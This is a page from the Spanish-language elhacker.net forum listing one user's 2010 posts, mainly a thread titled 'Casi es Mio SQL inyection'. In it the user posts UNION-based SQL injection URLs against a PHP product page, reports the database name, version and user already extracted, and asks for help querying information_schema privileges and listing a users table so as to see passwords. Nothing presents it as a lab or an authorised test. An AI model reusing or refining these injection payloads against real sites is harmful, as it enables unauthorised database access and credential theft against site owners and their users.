elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 22 Marzo 2010, 23:36 pm
lo siento los newbabys como yo aprendemos de maestros como vosotros, buscando .... gracias
12  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 22 Marzo 2010, 23:30 pm
para poder ver el password...
13  Seguridad Informática / Nivel Web / Re: Casi es Mio SQL inyection en: 22 Marzo 2010, 23:28 pm
jejejejeje, quiero ver las columnas de la base de datos, en ella hay una de usuarios supongo y no la puedo listar.... gracias
14  Seguridad Informática / Nivel Web / Casi es Mio SQL inyection en: 22 Marzo 2010, 23:22 pm
Vale en esta web tengo:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

Ya que hay 36-

La versioón del Mysql es : 4.1.22
La base de Datos: qar139
Usuario " Creo" : qar139@%



El tema es , intento sacar mas info como por ejemplo la lista de privilegios:

http://www.webvulnerable.net/productos.php?id=-1+union+all+select%201,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+information_schema.user_privileges--

pero me da este error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php  on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75


puede ser a la version del Mysql???  si es el caso alguien sabe como hacer la quiery correcta???

Gracias
15  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 22:33 pm
ya he provado antes y me da error siempre , mmmmmm es complejo este smarty
16  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 22:07 pm
Usa mysqli el cms bufffff mas dificil !!!!
17  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:59 pm
que post dices que es similar?????

Gracias
18  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:55 pm
Si eso me he fijado, estoy mirando el cms smarty 2.5.0 en google....
19  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:50 pm
Smarty version 2.5.0   mmmmm
20  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:42 pm
JAJAJAJAJAJ no no lo es jejejejejejejeje  mmmm no hay maneras buffff.....
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines